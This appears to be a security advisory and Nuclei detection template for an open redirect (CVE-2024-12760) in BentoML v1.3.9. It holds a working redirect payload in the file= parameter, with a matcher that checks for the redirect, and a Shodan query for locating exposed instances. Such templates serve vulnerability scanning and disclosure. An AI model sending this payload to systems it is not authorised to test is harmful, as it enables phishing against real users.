An open redirect vulnerability exists in BentoML v1.3.9, where the file parameter in the /ui/gradio_api/file= endpoint can be manipulated to redirect users to malicious websites. This could facilitate phishing attacks by tricking users into visiting attacker-controlled URLs.
PoC代码[已公开]
id: CVE-2024-12760
info:
name: BentoML v1.3.9 - Open Redirect
author: DhiyaneshDK
severity: medium
description: |
An open redirect vulnerability exists in BentoML v1.3.9, where the file parameter in the /ui/gradio_api/file= endpoint can be manipulated to redirect users to malicious websites. This could facilitate phishing attacks by tricking users into visiting attacker-controlled URLs.
reference:
- https://huntr.com/bounties/2a284ff6-cc6c-4a10-b72e-1bb31c842bca
metadata:
verified: true
max-request: 1
shodan-query: html:"BentoML"
tags: cve,cve2024,gradio,redirect,oss,bentoml,vuln
http:
- method: GET
path:
- "{{BaseURL}}/ui/gradio_api/file=https://oast.me"
matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)oast\.me.*$'
# digest: 4a0a0047304502201906a4ab20f0223fb536d0ea11f62f8e36b8bd6bc85de84949d7c5a643bc0f4a022100f91b84fb371c5a39229ef9c0700a3c5b1a1b2daa3eeb4353b3ad94bf99506f4e:922c64590222798bb761d5b6d8e72950